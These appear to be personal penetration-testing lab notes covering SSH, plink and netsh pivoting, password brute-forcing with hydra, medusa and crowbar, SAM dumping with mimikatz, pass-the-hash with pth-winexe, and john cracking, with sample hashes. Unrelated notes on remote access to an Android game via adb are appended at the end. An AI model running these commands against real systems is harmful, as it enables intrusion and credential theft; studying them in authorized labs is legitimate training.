Kali Linux machine on TCP port 8080 (127.0.0.1:8080), which will tunnel all incoming traffic to
any host in the target network, through the compromised Linux machine, which we log into as
student
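The recurring confusion with -L, -R and -D is which side of the SSH session ends up listening and which side the connection exits from. As an added example (not from these notes or from OpenSSH), this Python function decodes a forwarding spec into exactly that, using the forwards that appear in these notes as its inputs; the "needs GatewayPorts" flag reflects the sshd default of binding remote listeners to loopback only.

```python
def parse_forward(flag: str, spec: str) -> dict:
    """Describe an OpenSSH -L / -R / -D forwarding spec.

    -L [bind:]port:host:hostport  listener on the ssh client, traffic exits the server
    -R [bind:]port:host:hostport  listener on the ssh server, traffic exits the client
    -D [bind:]port                SOCKS proxy on the client, traffic exits the server
    -R [bind:]port                SOCKS proxy on the server, traffic exits the client
                                  (reverse dynamic forward, OpenSSH 7.6 and later)
    """
    if flag not in ("-L", "-R", "-D"):
        raise ValueError("flag must be -L, -R or -D")
    parts = spec.split(":")
    if len(parts) in (1, 2):                       # [bind:]port -> SOCKS
        if flag == "-L":
            raise ValueError("-L needs a destination host:port")
        bind = parts[0] if len(parts) == 2 else None
        port, dest = int(parts[-1]), None
    elif len(parts) in (3, 4):                     # [bind:]port:host:hostport
        if flag == "-D":
            raise ValueError("-D takes only [bind:]port")
        bind = parts[0] if len(parts) == 4 else None
        port = int(parts[-3])
        dest = (parts[-2], int(parts[-1]))
    else:
        raise ValueError(f"unparseable spec {spec!r}")
    if bind == "":
        bind = "*"                                 # ':2221:...' means all interfaces

    listener_side = "server" if flag == "-R" else "client"
    exit_side = "client" if flag == "-R" else "server"
    loopback = (None, "localhost", "127.0.0.1", "::1")
    return {
        "listener_side": listener_side,
        "bind": bind or "127.0.0.1",               # OpenSSH default: loopback only
        "port": port,
        "exit_side": exit_side,
        "dest": dest,                              # None means a SOCKS proxy
        "socks": dest is None,
        # a server-side listener on a non-loopback address is only honoured
        # when sshd_config on the server has GatewayPorts yes
        "needs_gatewayports": listener_side == "server" and bind not in loopback,
    }


def describe(flag: str, spec: str) -> str:
    """One-line human summary of a forward."""
    f = parse_forward(flag, spec)
    where = f"{f['bind']}:{f['port']} on the ssh {f['listener_side']}"
    if f["socks"]:
        return f"SOCKS proxy at {where}; connections exit from the ssh {f['exit_side']}"
    host, hport = f["dest"]
    return f"listener at {where} -> {host}:{hport}, connected from the ssh {f['exit_side']}"


if __name__ == "__main__":
    # the forwards used in these notes
    for flag, spec in [("-L", "0.0.0.0:445:192.168.1.110:445"),
                       ("-R", "10.11.0.4:2221:127.0.0.1:3306"),
                       ("-R", "1080"),
                       ("-D", "127.0.0.1:8080")]:
        print(flag, spec, "=>", describe(flag, spec))
```

The rule of thumb the function encodes: -L and -D put the listener where you typed the command, -R puts it on the far end, and traffic always leaves from the opposite side.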

We can run any network application through HTTP, SOCKS4, and SOCKS5
proxies with the help of ProxyChains

Add to /etc/proxychains.conf:

socks4 127.0.0.1 8080

sudo proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110

PLINK.exe

plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4

On first use plink tries to cache the host key and prompts for an interactive y/n, which hangs a non-interactive shell.

Solution: pipe the answer in:

cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4

netSH

Use netsh to do port forwarding on Windows; it is installed by default.

However, for this to work, the Windows system must have the IP Helper service running and IPv6
support must be enabled for the interface we want to use. Fortunately, both are on and enabled
by default on Windows operating systems.

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
netstat -anp TCP | find "4455"

By default the Windows firewall does not allow inbound connections to 4455; since we have SYSTEM privileges we can add a rule:

netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow

Before using smbclient, Samba's minimum protocol level must be set to SMB2 and the service restarted:

/etc/samba/smb.conf
min protocol = SMB2

sudo /etc/init.d/smbd restart
smbclient -L 10.11.0.22 --port=4455 --user=Administrator

Study Notes - 2021/07/06

HTTP htaccess password attack with medusa

Decompress the rockyou wordlist:

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

Password attack against Remote Desktop Protocol with crowbar

crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

-n number of threads
-b protocol
-s host (CIDR notation)
-u username
-C wordlist

RDP does not reliably handle multiple threads, so we use a single thread.

SSH attack with THC-Hydra

-l target username
-P wordlist
protocol://IP

hydra -l kali -P test_wdlist.txt ssh://127.0.0.1

HTTP POST attack with THC-Hydra

Obtain additional info about the http-form-post module options:

hydra http-form-post -U

<url>:<form parameters>:<condition string>[:<optional>[:<optional>]]

hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

^PASS^ is replaced by each wordlist entry, and the condition string is the text of a failed login, so a response without it counts as success. Request verbose output with -vV, and use -f to stop the attack when the first valid password is found.

Retrieve password hashes

hashid <hashvalue> identifies the hash type.

Inspect the /etc/shadow file:

sudo grep root /etc/shadow
root:$6$18cMHZ.mB57eU82l$lim7jazX00mXUZEB43IOtlHmpFcuTrceOJ1QObdaGr5fwsfsEryh5xcuJEpH7qOyiOmQHcGkn33vhy66GQDAi1:18696:0:99999:7:::

The password field has the form $id$salt$hash. The first part ($6) references the SHA-512 algorithm:

  • $1 = MD5
  • $2 = Blowfish
  • $2a = eksblowfish
  • $5 = SHA-256
  • $6 = SHA-512

18cMHZ.mB57eU82l is the salt.
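As an added example (not from these notes), the following Python decodes a shadow entry into algorithm, parameters, salt and hash, and handles the cases the list above does not cover: locked accounts (! or *), sha*crypt entries with rounds=N, bcrypt's unseparated salt+hash, and the $y$ (yescrypt) entries that newer distributions write. The root line is the one quoted above; the other sample lines are constructed.

```python
from datetime import date, timedelta

# crypt(3) identifiers as used by glibc/libxcrypt in /etc/shadow
CRYPT_IDS = {
    "1": "MD5 (md5crypt)",
    "2a": "bcrypt (eksblowfish)",
    "2b": "bcrypt",
    "2y": "bcrypt",
    "5": "SHA-256 (sha256crypt)",
    "6": "SHA-512 (sha512crypt)",
    "7": "scrypt",
    "y": "yescrypt",
}


def parse_shadow(line: str) -> dict:
    """Split one /etc/shadow line and decode its $id$salt$hash password field."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 9:
        raise ValueError("expected 9 colon-separated shadow fields")
    user, pw, lastchg = fields[0], fields[1], fields[2]
    info = {
        "user": user, "locked": False, "algorithm": None,
        "params": None, "salt": None, "hash": None,
        # field 3 is days since 1970-01-01 of the last password change
        "last_change": date(1970, 1, 1) + timedelta(days=int(lastchg)) if lastchg else None,
    }
    if pw.startswith(("!", "*")):
        info["locked"] = True            # '!' or '*' disables password login
        pw = pw.lstrip("!*")             # '!$6$...' keeps the old hash behind the lock
    if not pw.startswith("$"):
        if pw:                           # 13-char traditional DES: 2-char salt + 11-char hash
            info["algorithm"] = "DES (traditional crypt)"
            info["salt"], info["hash"] = pw[:2], pw[2:]
        return info
    parts = pw.split("$")[1:]            # '$6$salt$hash' -> ['6', 'salt', 'hash']
    alg = parts.pop(0)
    info["algorithm"] = CRYPT_IDS.get(alg, f"unknown id ${alg}$")
    if alg.startswith("2") and len(parts) == 2:
        # bcrypt: $2y$cost$<22-char salt><31-char hash>, no separator between them
        info["params"], info["salt"], info["hash"] = parts[0], parts[1][:22], parts[1][22:]
        return info
    if parts and (parts[0].startswith("rounds=") or alg == "y"):
        info["params"] = parts.pop(0)    # sha*crypt rounds=N, or the yescrypt parameter string
    if len(parts) >= 2:
        info["salt"], info["hash"] = parts[0], parts[1]
    return info


# the root entry quoted above
ROOT_LINE = ("root:$6$18cMHZ.mB57eU82l$lim7jazX00mXUZEB43IOtlHmpFcuTrceOJ1QObdaGr5fwsfsEryh5xcuJ"
             "EpH7qOyiOmQHcGkn33vhy66GQDAi1:18696:0:99999:7:::")
# constructed sample lines for the other formats
SAMPLES = [
    ROOT_LINE,
    "bob:$6$rounds=10000$abc123$ZZZ:18696:0:99999:7:::",
    "carol:$2y$10$" + "A" * 22 + "B" * 31 + ":18696:0:99999:7:::",
    "dave:$y$j9T$saltsalt$hashhash:18696:0:99999:7:::",
    "svc:!:18000:0:99999:7:::",
]

if __name__ == "__main__":
    for line in SAMPLES:
        p = parse_shadow(line)
        print(f"{p['user']:6} locked={p['locked']!s:5} {p['algorithm']} "
              f"params={p['params']} salt={p['salt']} changed={p['last_change']}")
```

The last_change date is worth printing alongside the algorithm: an old sha512crypt hash with the default rounds is a far better cracking target than a recent yescrypt one.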

SAM database cannot be copied while the operating system is running because the Windows kernel keeps an exclusive file system lock on the file.

mimikatz modules facilitate password hash extraction from the Local Security Authority Subsystem (LSASS) process memory where they are cached.

C:\Tools\password_attacks\mimikatz.exe
> privilege::debug
> token::elevate
> lsadump::sam

token::elevate command to elevate the security token from high integrity (administrator) to SYSTEM integrity. If mimikatz is launched from a SYSTEM shell, this step is not required.

use lsadump::sam to dump the contents of the SAM database

Passing the hash in Windows

The Pass-the-Hash (PtH) technique (discovered in 1997) allows an attacker to authenticate to a
remote target using a valid username and NTLM/LM hash rather than a clear-text password. This
works because NTLM/LM password hashes are not salted and remain static between sessions.
Moreover, a hash discovered on one target can be used not only to authenticate to that target
but also to any other target that has an account with the same username and password.

Security Accounts Manager (SAM)

To do this, we use pth-winexe from the Passing-The-Hash toolkit (a modified version of winexe), which performs authentication over the SMB protocol:

pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd

Question: what is "aad3b435b51404eeaad3b435b51404ee" and why are there two hashes?
The -U value is <LM hash>:<NT hash>. aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, which is what the SAM stores when LM hashing is disabled (the default on modern Windows); the NT hash after the colon is the one that actually authenticates.

NTLM hash algorithm:

MD4(UTF-16-LE(password))

Behind the scenes, the format of the NTLM hash we provided was changed into a NetNTLM
version 1 or 2 format during the authentication process. We can capture these hashes using
man-in-the-middle or poisoning attacks and either crack them or relay them

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

Password cracking

Recover a clear-text password from a hash:

john hash.txt --format=NT
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

Use john with Linux passwords:

grep victim /etc/passwd > test_pw.txt
sudo grep victim /etc/shadow > test_shadow.txt
unshadow test_pw.txt test_shadow.txt > test_unshadow.txt
john test_unshadow.txt

john needs the unshadowed format (passwd and shadow fields joined per user) as its input.

I created a victim user, but the hash type is $y$, which cannot be cracked.


Arknights Remote Access

Motivation

I played Arknights on the Bilibili server (Android only) with an Android emulator, and tried to clear some daily tasks from my iOS device.

Attempts

  • Approach 1: UI-less Arknights: need to capture and analyze some packets. I searched on GitHub; all auto scripts are based on Android emulators.
  • Approach 2: have an Android emulator running on a remote server, and control it with those auto scripts (CV based). However, it seems rented cloud VMs do not support nested virtualization (the Android emulator is another VM).
  • Approach 3 (current approach): run the emulator on my own Windows machine, and connect both the Windows machine and the mobile phone (or a browser, if a web-based console is provided) to the server. Drawbacks: access speed would be slow, since the server needs to relay between the web client and the Windows machine; my own PC has to keep running at home while I access it; authentication is needed to avoid a man-in-the-middle attack. Tried to find a way to connect the two machines behind NAT directly (NAT traversal).

Design - PC side

Connect the emulator with adb

Download the Android SDK platform tools (adb included) and add them to PATH.

The default adb server runs on 127.0.0.1:5037.

Mumu emulator

adb connect 127.0.0.1:7555
adb shell